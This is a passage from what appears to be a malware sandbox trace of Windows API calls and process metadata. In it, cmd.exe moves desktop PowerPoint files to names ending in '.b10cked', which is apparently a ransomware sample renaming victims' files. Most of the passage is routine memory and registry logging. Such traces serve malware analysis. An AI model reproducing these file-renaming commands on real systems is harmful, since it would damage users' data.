lpConsoleTitle=0x1af5a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.513] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0231.513] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0231.513] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0231.513] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0231.513] _wcsicmp (_String1="move", _String2="COPY") returned 10 
[0231.513] _wcsicmp (_String1="move", _String2="CD") returned 10 [0231.513] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0231.513] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0231.513] _wcsicmp (_String1="move", _String2="REN") returned -5 [0231.513] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0231.513] _wcsicmp (_String1="move", _String2="SET") returned -6 [0231.513] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0231.513] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0231.513] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0231.513] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0231.513] _wcsicmp (_String1="move", _String2="MD") returned 11 [0231.513] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0231.513] _wcsicmp (_String1="move", _String2="RD") returned -5 [0231.513] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0231.513] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0231.513] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0231.513] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0231.514] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0231.514] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0231.514] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0231.514] _wcsicmp (_String1="move", _String2="VER") returned -9 [0231.514] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0231.514] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0231.514] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0231.514] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0231.514] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0231.514] _wcsicmp (_String1="move", _String2="START") returned -6 [0231.514] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0231.514] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0231.514] _wcsicmp (_String1="move", 
_String2="MOVE") returned 0 [0231.516] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0231.516] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0231.516] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1af364, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1af35c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1af35c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0231.516] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0231.516] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0231.516] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0231.516] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0231.516] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0231.516] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0231.516] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0231.516] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0231.516] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 
[0231.517] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0231.517] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0231.517] _wcsicmp (_String1="TDXT9-~1.PPT", _String2=".") returned 70 [0231.517] _wcsicmp (_String1="TDXT9-~1.PPT", _String2="..") returned 70 [0231.517] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\TDXT9-~1.PPT" (normalized: "c:\\users\\eebsym5\\desktop\\tdxt9-~1.ppt")) returned 0x20 [0231.518] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x341d50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.518] SetErrorMode (uMode=0x0) 
returned 0x0 [0231.518] SetErrorMode (uMode=0x1) returned 0x0 [0231.518] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\TDXT9-~1.PPT", nBufferLength=0x104, lpBuffer=0x1aecec, lpFilePart=0x1aecd4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\TDXT9-~1.PPT", lpFilePart=0x1aecd4*="TDXT9-~1.PPT") returned 0x25 [0231.518] SetErrorMode (uMode=0x0) returned 0x1 [0231.518] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.518] _wcsicmp (_String1="TDXT9-~1.PPT", _String2=".") returned 70 [0231.518] _wcsicmp (_String1="TDXT9-~1.PPT", _String2="..") returned 70 [0231.518] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\TDXT9-~1.PPT" (normalized: "c:\\users\\eebsym5\\desktop\\tdxt9-~1.ppt")) returned 0x20 [0231.518] SetErrorMode (uMode=0x0) returned 0x0 [0231.518] SetErrorMode (uMode=0x1) returned 0x0 [0231.518] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\TDXT9-~1.PPT", nBufferLength=0x104, lpBuffer=0x1af168, lpFilePart=0x1aef00 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\TDXT9-~1.PPT", lpFilePart=0x1aef00*="TDXT9-~1.PPT") returned 0x25 [0231.518] SetErrorMode (uMode=0x0) returned 0x1 [0231.518] SetErrorMode (uMode=0x0) returned 0x0 [0231.518] SetErrorMode (uMode=0x1) returned 0x0 [0231.518] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Tdxt9-_3mYM7NtN.pptx.b10cked", nBufferLength=0x104, lpBuffer=0x1af370, lpFilePart=0x1aef00 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Tdxt9-_3mYM7NtN.pptx.b10cked", lpFilePart=0x1aef00*="Tdxt9-_3mYM7NtN.pptx.b10cked") returned 0x35 [0231.518] SetErrorMode (uMode=0x0) returned 0x1 [0231.519] SetLastError (dwErrCode=0x0) [0231.519] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Tdxt9-_3mYM7NtN.pptx.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\tdxt9-_3mym7ntn.pptx.b10cked")) returned 0xffffffff [0231.519] GetLastError () returned 0x2 [0231.519] FindFirstFileExW (in: 
lpFileName="C:\\Users\\EEBsYm5\\Desktop\\TDXT9-~1.PPT", fInfoLevelId=0x1, lpFindFileData=0x1ae87c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ae87c) returned 0x330f20 [0231.519] FindNextFileW (in: hFindFile=0x330f20, lpFindFileData=0x1ae87c | out: lpFindFileData=0x1ae87c) returned 0 [0231.519] GetLastError () returned 0x12 [0231.519] FindClose (in: hFindFile=0x330f20 | out: hFindFile=0x330f20) returned 1 [0231.520] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\TDXT9-~1.PPT", fInfoLevelId=0x1, lpFindFileData=0x341af0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x341af0) returned 0x330f20 [0231.520] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Tdxt9-_3mYM7NtN.pptx.b10cked", nBufferLength=0x104, lpBuffer=0x1aeb14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Tdxt9-_3mYM7NtN.pptx.b10cked", lpFilePart=0x0) returned 0x35 [0231.520] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Tdxt9-_3mYM7NtN.pptx", nBufferLength=0x104, lpBuffer=0x1aeb14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Tdxt9-_3mYM7NtN.pptx", lpFilePart=0x0) returned 0x2d [0231.520] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Tdxt9-_3mYM7NtN.pptx" (normalized: "c:\\users\\eebsym5\\desktop\\tdxt9-_3mym7ntn.pptx")) returned 0x20 [0231.520] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\Tdxt9-_3mYM7NtN.pptx" (normalized: "c:\\users\\eebsym5\\desktop\\tdxt9-_3mym7ntn.pptx"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Tdxt9-_3mYM7NtN.pptx.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\tdxt9-_3mym7ntn.pptx.b10cked"), dwFlags=0x3) returned 1 [0231.521] FindClose (in: hFindFile=0x330f20 | out: hFindFile=0x330f20) returned 1 [0231.521] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1aeac8 | out: _Buffer=" 1") returned 9 [0231.521] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.521] 
GetFileType (hFile=0x7) returned 0x2 [0231.599] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0231.599] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1aea54 | out: lpMode=0x1aea54) returned 1 [0231.600] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.600] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1aea88 | out: lpConsoleScreenBufferInfo=0x1aea88) returned 1 [0231.600] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0231.600] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1aeac8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0231.601] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1aeaac, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1aeaac*=0x1a) returned 1 [0231.601] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.601] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0231.601] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.601] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0231.601] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.601] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0231.602] SetConsoleInputExeNameW () returned 0x1 [0231.602] GetConsoleOutputCP () returned 0x1b5 [0231.602] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.602] SetThreadUILanguage (LangId=0x0) returned 0x409 [0231.602] exit (_Code=0) Process: id = "613" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16340" os_pid = "0x130" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" 
parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\TWV414~1.PPT\" \"C:\\Users\\EEBsYm5\\Desktop\\tWV414DCFHSA.ppt.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34405 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34406 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34407 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34408 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 34409 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34410 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34411 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34412 start_va = 0x7ffb0000 end_va = 
0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34413 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 34414 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34665 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34666 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34667 start_va = 0x70000 end_va = 0x7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 34668 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 34669 start_va = 0x290000 end_va = 0x2f6fff entry_point = 0x290000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34670 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 34671 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34672 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34673 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 
0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34674 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34675 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34676 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34677 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34678 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34749 start_va = 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 34750 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34751 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 34752 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 34753 
start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 34754 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 34755 start_va = 0x3d0000 end_va = 0x4d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 34756 start_va = 0x4e0000 end_va = 0x10dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 34757 start_va = 0x10e0000 end_va = 0x1242fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010e0000" filename = "" Region: id = 34758 start_va = 0x1250000 end_va = 0x1250fff entry_point = 0x0 region_type = private name = "private_0x0000000001250000" filename = "" Thread: id = 853 os_tid = 0xd98 [0231.917] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28f7dc | out: lpSystemTimeAsFileTime=0x28f7dc*(dwLowDateTime=0xbdc8dfc0, dwHighDateTime=0x1d440a9)) [0231.917] GetCurrentProcessId () returned 0x130 [0231.917] GetCurrentThreadId () returned 0xd98 [0231.917] GetTickCount () returned 0x3fd03 [0231.917] QueryPerformanceCounter (in: lpPerformanceCount=0x28f7d4 | out: lpPerformanceCount=0x28f7d4*=28870602789) returned 1 [0231.918] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0231.918] __set_app_type (_Type=0x1) [0231.918] __p__fmode () returned 0x76b331f4 [0231.918] __p__commode () returned 0x76b331fc [0231.918] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0231.918] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0231.918] GetCurrentThreadId () returned 0xd98 [0231.918] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd98) returned 0x38 
[0231.918] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0231.918] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0231.918] SetThreadUILanguage (LangId=0x0) returned 0x409 [0231.923] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0231.923] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f76c | out: phkResult=0x28f76c*=0x0) returned 0x2 [0231.923] VirtualQuery (in: lpAddress=0x28f7a3, lpBuffer=0x28f73c, dwLength=0x1c | out: lpBuffer=0x28f73c*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.923] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28f73c, dwLength=0x1c | out: lpBuffer=0x28f73c*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0231.923] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28f73c, dwLength=0x1c | out: lpBuffer=0x28f73c*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0231.923] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28f73c, dwLength=0x1c | out: lpBuffer=0x28f73c*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.923] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28f73c, dwLength=0x1c | out: lpBuffer=0x28f73c*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0231.923] GetConsoleOutputCP () returned 0x1b5 [0231.925] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 
[0231.925] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0231.925] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.925] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0231.926] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.926] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0231.928] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.928] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0231.929] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.929] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0231.930] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.930] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0231.971] GetEnvironmentStringsW () returned 0xa0168* [0231.971] FreeEnvironmentStringsW (penv=0xa0168) returned 1 [0231.971] GetEnvironmentStringsW () returned 0xa0168* [0231.971] FreeEnvironmentStringsW (penv=0xa0168) returned 1 [0231.971] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e6dc | out: phkResult=0x28e6dc*=0x40) returned 0x0 [0231.971] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e6e4, lpData=0x28e6e8, lpcbData=0x28e6e0*=0x1000 | out: lpType=0x28e6e4*=0x0, lpData=0x28e6e8*=0x90, lpcbData=0x28e6e0*=0x1000) returned 0x2 [0231.971] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e6e4, lpData=0x28e6e8, lpcbData=0x28e6e0*=0x1000 | out: lpType=0x28e6e4*=0x4, lpData=0x28e6e8*=0x1, lpcbData=0x28e6e0*=0x4) returned 0x0 [0231.971] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e6e4, lpData=0x28e6e8, lpcbData=0x28e6e0*=0x1000 | out: lpType=0x28e6e4*=0x0, lpData=0x28e6e8*=0x1, lpcbData=0x28e6e0*=0x1000) returned 0x2 [0231.971] RegQueryValueExW (in: hKey=0x40, 
lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e6e4, lpData=0x28e6e8, lpcbData=0x28e6e0*=0x1000 | out: lpType=0x28e6e4*=0x4, lpData=0x28e6e8*=0x0, lpcbData=0x28e6e0*=0x4) returned 0x0 [0231.971] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e6e4, lpData=0x28e6e8, lpcbData=0x28e6e0*=0x1000 | out: lpType=0x28e6e4*=0x4, lpData=0x28e6e8*=0x40, lpcbData=0x28e6e0*=0x4) returned 0x0 [0231.972] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e6e4, lpData=0x28e6e8, lpcbData=0x28e6e0*=0x1000 | out: lpType=0x28e6e4*=0x4, lpData=0x28e6e8*=0x40, lpcbData=0x28e6e0*=0x4) returned 0x0 [0231.972] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e6e4, lpData=0x28e6e8, lpcbData=0x28e6e0*=0x1000 | out: lpType=0x28e6e4*=0x0, lpData=0x28e6e8*=0x40, lpcbData=0x28e6e0*=0x1000) returned 0x2 [0231.972] RegCloseKey (hKey=0x40) returned 0x0 [0231.972] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e6dc | out: phkResult=0x28e6dc*=0x40) returned 0x0 [0231.972] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e6e4, lpData=0x28e6e8, lpcbData=0x28e6e0*=0x1000 | out: lpType=0x28e6e4*=0x0, lpData=0x28e6e8*=0x40, lpcbData=0x28e6e0*=0x1000) returned 0x2 [0231.972] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e6e4, lpData=0x28e6e8, lpcbData=0x28e6e0*=0x1000 | out: lpType=0x28e6e4*=0x4, lpData=0x28e6e8*=0x1, lpcbData=0x28e6e0*=0x4) returned 0x0 [0231.972] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e6e4, lpData=0x28e6e8, lpcbData=0x28e6e0*=0x1000 | out: lpType=0x28e6e4*=0x0, 